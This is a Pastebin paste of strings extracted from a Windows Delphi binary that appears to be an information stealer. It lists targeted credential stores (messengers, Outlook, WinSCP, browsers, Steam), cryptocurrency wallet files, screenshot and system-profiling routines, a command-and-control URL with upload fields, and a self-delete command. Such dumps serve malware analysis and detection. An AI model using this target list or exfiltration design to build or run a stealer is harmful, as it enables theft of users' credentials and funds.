Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- jjj
- jjj
- jjj
- jjj
- SOFTWARE\Microsoft\Windows NT\CurrentVersion
- ProductName
- MachineGuid
- SOFTWARE\Microsoft\Cryptography
- jjjjjj
- jjjjjjj
- jjjjjjj
- jjj
- jjj
- %TEMP%\1Mo\
- %appdata%\1Mo\
- PATH
- %TEMP%\
- jjjj
- .tmp
- %TEMP%
- jjjj
- Version
- jjj
- jjjj
- Email
- User
- Server
- Port
- Password
- jjj
- HostName
- PortNumber
- UserName
- Password
- </jid>
- <jid type="QString">
- </password>
- <password type="QString">
- %Appdata%\Psi+\profiles\
- \accounts.xml
- %Appdata%\Psi\profiles\
- </account>
- <account>
- </name>
- <name>
- </password>
- <password>
- </protocol>
- <protocol>
- %APPDATA%\.purple\accounts.xml
- %TEMP%\tempbuffer.dat
- MZP
- This program must be run under Win32
- CODE
- `DATA
- BSS
- .idata
- .reloc
- P.rsrc
- .idata
- .reloc
- P.rsrc
- Char
- Byte
- String8
- WideString
- u:hD
- SVWUQ
- SVWU
- SVW
- SVWU
- SVWU
- SVWU
- SVWUQ
- SVWU
- SVWU
- SVW
- ZYYd
- ZYYd
- SVW
- SVWU
- SVW
- SVW
- SVWU
- SVW
- Uhl @
- ZYYd
- QSVW
- ZYYd
- SVWU
- QSVW
- ZYYd
- SVWU
- C<"u1S
- Q<"u8S
- SVW
- SVQ
- uENt
- u0Nt
- u%Nt
- SVWR
- GKu
- SVW
- xtZ
- XtU
- xtH
- XtC
- ~KxI[)
- ZYYd
- SOFTWARE\Borland\Delphi\RTL
- FPUMaskValue
- PPRTj
- PRQ
- QTj
- YYZX
- RTj
- RQP
- YZXtp
- VWUd
- SPRQ
- SVWU
- t=HtN
- t.Ht
- SVW
- ZYYd
- SVW
- UhR0@
- ZYYd
- SVW
- tWf
- SVWU
- SVW
- PQj
- PQj
- SVWU
- BBB
- t-Rf;
- t f;J
- WPQ
- WPQ
- SVW
- SVW
- SVWRP
- SVW
- uXJt
- uAJt
- u:Jt
- It2S
- SVW
- tVSVWU
- t1SVW
- SVW
- SVW
- QRP
- SVWU
- PQR
- BBB
- t-Rf;
- t f;J
- WPQ
- SVWUQ
- SVWU
- SVRP
- SVW
- uAJt
- SVW
- SVWUQ
- SVWU
- t:SVW
- Jx f
- SVW
- SVW
- PSVW
- SVWU
- SVWU
- SVW
- USVW1
- SVW
- SVW
- ZYYd
- Uh,G@
- ZYYd
- TQR
- FFF;M
- Uh'I@
- ZYYd
- UhwI@
- ZYYd
- ZYYd
- UhBJ@
- ZYYd
- hIJ@
- ZYYd
- ZYYd
- UhUM@
- ZYYd
- SVW3
- UhyN@
- ZYYd
- ST234LMUV56CklAopq78Brstuvwxyz01NOPQRmGHIJKWXYZabcdefgDEFhijn9+/
- SVW3
- ZYYd
- ST234LMUV56CklAopq78Brstuvwxyz01NOPQRmGHIJKWXYZabcdefgDEFhijn9+/
- SVW
- UhVQ@
- rYBF
- AJu
- ZYYd
- ZYYd
- SVW
- FOu
- ZYYd
- ZYYd
- UhES@
- ZYYd
- hLS@
- Uh}S@
- ZYYd
- ZYYd
- SVW
- PSj
- ZYYd
- DnsQuery_A
- dnsapi.dll
- SVW3
- Uh7X@
- hTX@
- hlX@
- CNu
- ZYYd
- wsock32.dll
- WSAStartup
- gethostbyname
- socket
- send
- recv
- htons
- connect
- closesocket
- GET
- HTTP/1.0
- Host:
- Connection: close
- Accept-Language: en-US
- SVW
- DPS
- ZYYd
- dbYoAZ0mmwYgdla/r+kyjMUIj6CzlEBzNcEx4ir8k+PhIh1lIUSQBnjcBb
- iQIEWsbBFDIC25n/rJWaIvKsVCJh0OA6vqFAwtbGxp1R9XfyOQYS9QQhwc+Bq1BfqeA8pHahQFsJVW7uCasyEF9S+RXheiX0n0s4B3PKuXR
- .bit
- POST
- HTTP/1.0
- Host:
- Connection: close
- Content-Length:
- Accept-Language: en-US
- Content-Type: application/octet-stream
- ZYYd
- TSwdPwd
- TPwdArray
- GlobalVars
- GlobalVars
- EDSER93-1EDA-4W4C-BEED-WNFYRIFHBF4C04CFEW99-FES9-4558-9FEF-HFDIUFG6D851
- QSVW
- FKu
- ZYYd
- SVW
- Uh[c@
- ZYYd
- hbc@
- SVWU
- 3hXd@
- hhd@
- 3htd@
- hhd@
- hhd@
- hhd@
- SOFT:
- HOST:
- USER:
- PASS:
- UNKN:
- SVW
- GKu
- Uh]e@
- ZYYd
- hde@
- ZYYd
- hLj@
- hpj@
- hPk@
- hpk@
- hHl@
- hhl@
- hxl@
- hLm@
- htm@
- kernel32.dll
- ExpandEnvironmentStringsW
- GetComputerNameW
- GlobalMemoryStatus
- CreateFileW
- GetFileSize
- CloseHandle
- ReadFile
- GetFileAttributesW
- CreateMutexA
- GetLastError
- GetCurrentDirectoryW
- SetEnvironmentVariableW
- SetCurrentDirectoryW
- FindFirstFileW
- FindNextFileW
- LocalFree
- GetTickCount
- CopyFileW
- FindClose
- GlobalMemoryStatusEx
- CreateToolhelp32Snapshot
- Process32FirstW
- Process32NextW
- GetModuleFileNameW
- SetDllDirectoryW
- GetLocaleInfoA
- GetLocalTime
- GetTimeZoneInformation
- RemoveDirectoryW
- DeleteFileW
- GetLogicalDriveStringsA
- GetDriveTypeA
- advapi32.dll
- GetUserNameW
- RegCreateKeyExW
- RegQueryValueExW
- RegCloseKey
- RegOpenKeyExW
- AllocateAndInitializeSid
- LookupAccountSidA
- CreateProcessAsUserW
- CheckTokenMembership
- RegOpenKeyW
- RegEnumKeyW
- RegEnumValueW
- CryptAcquireContextA
- CryptCreateHash
- CryptHashData
- CryptGetHashParam
- CryptDestroyHash
- CryptReleaseContext
- user32.dll
- EnumDisplayDevicesW
- wvsprintfA
- GetKeyboardLayoutList
- shell32.dll
- ShellExecuteW
- ZYYd
- TStringArray
- GLOBALFUNC
- u(Kx
- SVW
- JGF
- JGF
- ZYYd
- QSV
- Uh*q@
- BHu
- ZYYd
- ZYYd
- QSV
- UhLr@
- ZYYd
- hSr@
- QSVW
- COu
- ZYYd
- QSVW
- ZYYd
- SVW
- GKu
- ZYYd
- SQhtv@
- IsWow64Process
- kernel32.dll
- SVW
- CNu
- ZYYd
- ZYYd
- SVW3
- ZYYd
- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- SVW3
- FOu
- ZYYd
- QSV
- Uhf}@
- ZYYd
- ZYYd
- SVW
- ZYYd
- QQQQQQSVW
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- Uhg
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- Uhn
- ZYYd
- ZYYd
- QSV
- UhZ
- ZYYd
- QSV
- ZYYd
- QQQQS
- ZYYd
- SVWUQ
- SVWU
- QQQQQSVW
- ZYYd
- Windows
- Sj j
- ZYYd
- ZYYd
- SVW3
- tLj
- ZYYd
- WTSGetActiveConsoleSessionId
- kernel32.dll
- WTSQueryUserToken
- wtsapi32.dll
- CreateEnvironmentBlock
- userenv.dll
- SVW3
- ZYYd
- ZYYd
- SVW
- KVy
- ZYYd
- ZYYd
- ZYYd
- Uhk
- ZYYd
- UhI
- ZYYd
- ZYYd
- QQQQQQQSV
- ZYYd
- QQQQQSV
- Php
- ZYYd
- ZYYd
- ZYYd
- MTable
- MozillaBased
- SVW
- UhD
- ZYYd
- SVW
- ZYYd
- Uha
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- CryptUnprotectData
- crypt32.dll
- tlj
- ZYYd
- SVW3
- Uhl
- ZYYd
- ZYYd
- UhU
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- taString
- uURLHistory
- SVW3
- ZYYd
- UhQ
- ZYYd
- ZYYd
- uIE7_decodeU
- SVW3
- UhW
- ZYYd
- SVW3
- ZYYd
- uIE7_decodeU
- SVW3
- Uhj
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- UhU
- ZYYd
- QQQQQQSVW3
- UhF
- ZYYd
- ZYYd
- InternetExplorer
- ZYYd
- PVAULT_CRED8
- EdgePwds
- SVW3
- ZYYd
- SVW3
- Uhk
- ZYYd
- ZYYd
- outlookDecrU
- SVW
- ZYYd
- Server
- Outlook
- ZYYd
- UhU
- ZYYd
- SVW
- UhP
- ZYYd
- ZYYd
- QQQQQSVW
- UhY
- ZYYd
- ZYYd
- SVW3
- FOu
- ZYYd
- QSV3
- ZYYd
- WinSCP
- ZYYd
- SVW3
- ZYYd
- ZYYd
- </roster-cache>
- <roster-cache>
- QSVW
- Uhg
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- ZYYd
- PsiPlus
- Psi
- Uhm
- ZYYd
- ZYYd
- Pidgin
- </account>
- <account>
- ZYYd
- ZYYd
- QQQQQQQSVW3
- UhU
- ZYYd
- ZYYd
- ZYYd
- UhC
- ZYYd
- ZYYd
- ZYYd
- QQQQQQ
- uBj
- ZYYd
- ZYYd
- ZYYd
- SVW
- ZYYd
- .tmp
- %TEMP%
- .tmp
- %TEMP%
- .tmp
- %TEMP%
- \Cookies
- .txt
- .txt
- \*.txt
- \*.coo
- kie
- .txt
- .tmp
- %TEMP%
- .tmp
- %TEMP%
- .tmp
- %TEMP%
- .txt
- .txt
- %APPDATA%\Skype
- main.db
- \main.db
- SteamPath
- Software\Valve\Steam
- \ssfn*
- \Config\*.vdf
- \Config\
- %APPDATA%\
- wallet.dat
- \wallet.dat
- electrum.dat
- \electrum.dat
- .wallet
- \.wallet
- %APPDATA%\MultiBitHD
- mbhd.wallet.aes
- \MultiBitHD\
- \mbhd.wallet.aes
- \mbhd.checkpoints
- mbhd.checkpoints
- \mbhd.spvchain
- mbhd.spvchain
- \mbhd.yaml
- mbhd.yaml
- wallet_path
- Software\monero-project\monero-core
- \Monero\
- .address.txt
- .keys
- strDataDir
- Software\Bitcoin\Bitcoin-Qt
- \BitcoinBitcoinQT\wallet.dat
- CPU Model:
- jjjjjjjj
- UTC+
- Ajj
- Coins
- Coins\Electrum
- %appdata%\Electrum\wallets\
- Skype
- Telegram
- D877F783D5*,map*
- %appdata%\Telegram Desktop\tdata\
- Steam
- image/jpeg
- </pwds
- <coks
- </coks
- <file
- </file
- <list
- </list
- http://
- https://
- %TEMP%\
- /c timeout 4 & del "
- cmd
- ZYYd
- ZYYd
- TRUE
- FALSE
- SVW
- UhW
- ZYYd
- ZYYd
- ZYYd
- FALSE
- TRUE
- SVW
- ZYYd
- ZYYd
- ZYYd
- FALSE
- TRUE
- SVW
- Uhb
- ZYYd
- ZYYd
- SVW3
- ZYYd
- ZYYd
- SVW
- ZYYd
- FALSE
- SVW
- ZYYd
- SVW
- ZYYd
- ZYYd
- ZYYd
- SVW
- Uha%A
- ht%A
- ZYYd
- ZYYd
- ZYYd
- hh%A
- SVW
- ZYYd
- hH(A
- ZYYd
- ZYYd
- QSVW
- Uh++A
- hd+A
- ZYYd
- hl+A
- hl+A
- hx+A
- ZYYd
- ZYYd
- SVW
- ZYYd
- ZYYd
- SVW3
- ZYYd
- ZYYd
- SVW
- Uhr:A
- UhN9A
- ZYYd
- ZYYd
- hy:A
- ZYYd
- Browsers\Cookies
- ZYYd
- Uhp;A
- ZYYd
- hw;A
- ZYYd
- ZYYd
- uFileFinderU
- SVW
- Uh3FA
- PFA
- dFA
- hpFA
- hpFA
- hpFA
- ZYYd
- h=FA
- .LNK
- ZYYd
- ZYYd
- UhQIA
- ZYYd
- hXIA
- QSVW
- h,LA
- h,LA
- PLA
- hpLA
- hpLA
- ZYYd
- ZYYd
- QSVW
- PVA
- h\VA
- h\VA
- hdVA
- h\VA
- h\VA
- h\VA
- hdVA
- h\VA
- h\VA
- h\VA
- h\VA
- h\VA
- h\VA
- h\VA
- h\VA
- h\VA
- h\VA
- PVA
- h\VA
- h\VA
- h8WA
- h\WA
- h|WA
- h\VA
- h\VA
- h8WA
- h\WA
- h\VA
- h\VA
- h\WA
- h\VA
- h\VA
- h\WA
- h8XA
- h\VA
- h\VA
- hTXA
- lXA
- tYA
- ZYYd
- h&VA
- ZYYd
- SVW
- ZYYd
- U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs
- RGlzcGxheU5hbWU=
- U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
- RGlzcGxheVZlcnNpb24=
- ZYYd
- GlobalMemoryStatusEx
- kernel32.dll
- SVW3
- PSj
- ZYYd
- EnumDisplayDevicesA
- user32.dll
- UhlcA
- h|cA
- 3h0dA
- hDdA
- 3hPdA
- hDdA
- ZYYd
- hscA
- UHJvY2Vzc29yTmFtZVN0cmluZw==
- SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==
- CPU Count:
- GetRAM:
- Video Info
- ddA
- uProgAndProc
- SVW
- h(fA
- h(fA
- ZYYd
- SVW3
- UhbiA
- xiA
- BHu
- ZYYd
- hiiA
- Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90
- kernel32.dll
- UHJvY2VzczMyRmlyc3RX
- UHJvY2VzczMyTmV4dFc=
- a2VybmVsMzIuZGxs
- SVW3
- PjY
- h,kA
- ZYYd
- SVW3
- h,lA
- ZYYd
- h$mA
- h$mA
- ZYYd
- h(pA
- h@pA
- 3hLpA
- hdpA
- 3htpA
- h@pA
- h@pA
- 3h qA
- hdpA
- hdpA
- h@pA
- h@pA
- 3h0qA
- h@pA
- ZYYd
- MachineID :
- EXE_PATH :
- Windows :
- Computer(Username) :
- Screen:
- Layouts:
- LocalTime:
- Zone:
- [Soft]
- Uh]qA
- ZYYd
- hdqA
- ZYYd
- ZYYd
- ZYYd
- GDIScreenShot
- SVW3
- ZYYd
- SVW3
- Uh;uA
- ZYYd
- hBuA
- UhquA
- ZYYd
- hxuA
- h wA
- h4wA
- hLwA
- hdwA
- hpwA
- hdwA
- wcscmp
- crtdll.dll
- GdiplusStartup
- Gdiplus.dll
- GdiplusShutdown
- GdipCreateBitmapFromHBITMAP
- GdipGetImageEncodersSize
- GdipGetImageEncoders
- GdipDisposeImage
- GdipSaveImageToStream
- CreateStreamOnHGlobal
- ole32.dll
- GetHGlobalFromStream
- QSVW
- ZYYd
- 4vds98f74sdvc89svwd
- login.giocherialaragnatela.it/azs/index.php
- getcfg=
- exit
- PasswordsList.txt
- scr.jpg
- %DSK_
- Files\
- ip-api.com/json
- "query":"
- "countryCode":"
- ip.txt
- System.txt
- reportdata=<info
- </info
- <pwds
- ZYYd
- ZYYd
- hqA
- pqA
- LuA
- Error
- Runtime error at 00000000
- 0123456789ABCDEF
- :5vsv6v
- vzZ
- vLH
- hu9<iu
- %lRV
- r;6Hv
- AHv
- wPw
- vLT
- kernel32.dll
- DeleteCriticalSection
- LeaveCriticalSection
- EnterCriticalSection
- InitializeCriticalSection
- VirtualFree
- VirtualAlloc
- LocalFree
- LocalAlloc
- GetTickCount
- QueryPerformanceCounter
- GetVersion
- GetCurrentThreadId
- WideCharToMultiByte
- MultiByteToWideChar
- GetThreadLocale
- GetStartupInfoA
- GetModuleFileNameA
- GetLocaleInfoA
- GetCommandLineA
- FreeLibrary
- ExitProcess
- WriteFile
- UnhandledExceptionFilter
- RtlUnwind
- RaiseException
- GetStdHandle
- user32.dll
- GetKeyboardType
- MessageBoxA
- CharNextA
- advapi32.dll
- RegQueryValueExA
- RegOpenKeyExA
- RegCloseKey
- oleaut32.dll
- SysFreeString
- SysReAllocStringLen
- SysAllocStringLen
- kernel32.dll
- GetModuleHandleA
- advapi32.dll
- RegOpenKeyExA
- RegEnumKeyA
- FreeSid
- kernel32.dll
- WriteFile
- Sleep
- LocalFree
- LoadLibraryExW
- LoadLibraryA
- GlobalUnlock
- GlobalLock
- GetTickCount
- GetSystemInfo
- GetProcAddress
- GetModuleHandleA
- GetModuleFileNameA
- GetFileAttributesW
- GetCurrentProcessId
- GetCurrentProcess
- FreeLibrary
- FindNextFileW
- FindFirstFileW
- FindClose
- ExitProcess
- DeleteFileW
- CreateDirectoryW
- CopyFileW
- gdi32.dll
- SelectObject
- DeleteObject
- DeleteDC
- CreateCompatibleDC
- CreateCompatibleBitmap
- BitBlt
- user32.dll
- ReleaseDC
- GetSystemMetrics
- GetDC
- ole32.dll
- OleInitialize
- CoCreateInstance
- 0(040F0N0V0^0f0n0v0~0
- 1:1B1J1R1Z1b1j1r1{1
- 8!8)838=8G8]8c8q8
- 9/969@9J9T9`9k9|9
- 0-060T0Z0b0
- 1&1>1b1j1p1v1
- 5,5E5V5k5x5
- :!;6;J;R;h;
- 0&0:0n0r0x0|0
- 1;1E1O1W1]1k1
- F0O0J1S1i6z6
- :&:=:N:[:b:f:l:p:v:}:
- ;";-;>;J;O;T;[;b;l;
- <&<.<6<><F<N<V<^<f<n<v<~<
- =7=C=P=b=
- 2'333@3R3_3k3x3
- 6*676D6Q6^6k6x6
- :K:b:y:
- <(<?<O<h<p<u<}<
- 0!0)01090A0L0_0g0x0
- 1$1J1V1a1n1y1
- 5&50565@5F5X5j5w5
- 6(6-6:6?6L6Q6^6c6p6u6
- 7$7)767;7H7M7Z7_7l7q7~7
- 8,818>8C8P8U8b8g8t8y8
- 9(9-9:9?9L9Q9[9`9e9p9u9z9
- 3"3B3b3u3
- 7P8e8x8
- ;(;C;M;n;
- =!>W>c>h>
- 8"8'8A8F8b8~8E9
- <5<?<Z<f<x<
- 4 404C4V4i4|4
- 616D6W6j6}6
- 7(7;7N7a7t7
- 828E8X8k8~8
- 9)9<9O9b9u9
- : :3:F:Y:l:
- ;*;=;P;c;v;
- <!<4<G<Z<m<
- =+=>=Q=d=w=
- ?$?.?8?B?L?V?`?j?t?~?
- 0(020<0F0P0Z0d0n0x0
- 1"1,161@1J1T1^1h1r1|1
- 2&202:2D2N2X2b2l2v2
- 3 3*343>3H3R3\3f3p3z3
- 4$4.484B4L4V4`4j4t4~4
- 5(525D5V5c5o5v5
- 6@7E7M7Y7b7
- 838H8M8b8g8|8
- 92979L9Q9f9k9
- ;S<_<f<x<
- =(=D=I=P=e=
- 0A1S1q1
- 373D3O3t3
- 4%414E4T4b4u4
- 5!555D5R5e5q5
- :-:>:-;M;f;u;
- 1L1e1w1
- 3J3c3u3
- 5H5a5s5
- ;'<3<:<L<^<k<w<
- 474C4P4b4z4
- 272C2P2b2|2
- :O:T:o:
- =J>Z>i>|>
- 4O6[6h6z6
- 6%7*7W7\7t7y7
- <.<><L<a<u<{<
- <U=j=r=
- ? ?+?J?j?w?
- 2I2Z2L3b3m3
- 2C2K2l2
- 4+4H4d4y4
- 5M5_5u5,646F6_6m6
- :-:8:Q:c:n:
- 222D2c2u2
- 617?7P7i7w7
- 81868Y8k8|839?9L9^9
- ;G<V<n<
- <>=I=Y=l=~=
- ?)?N?S?m?r?
- ?1K1X1j1w1
- 223>3K3X3e3r3
- 3J4W4v4
- 6!6&6+6;6@6E6U6Z6_6o6t6y6
- :@:E:J:`:z:
- 2Y2e2w2|2
- 3*363H3M3R3^3p3|3
- >.>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
- ? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
- 1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
- 2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
- 3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
- 4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
Add Comment
Please, Sign In to add comment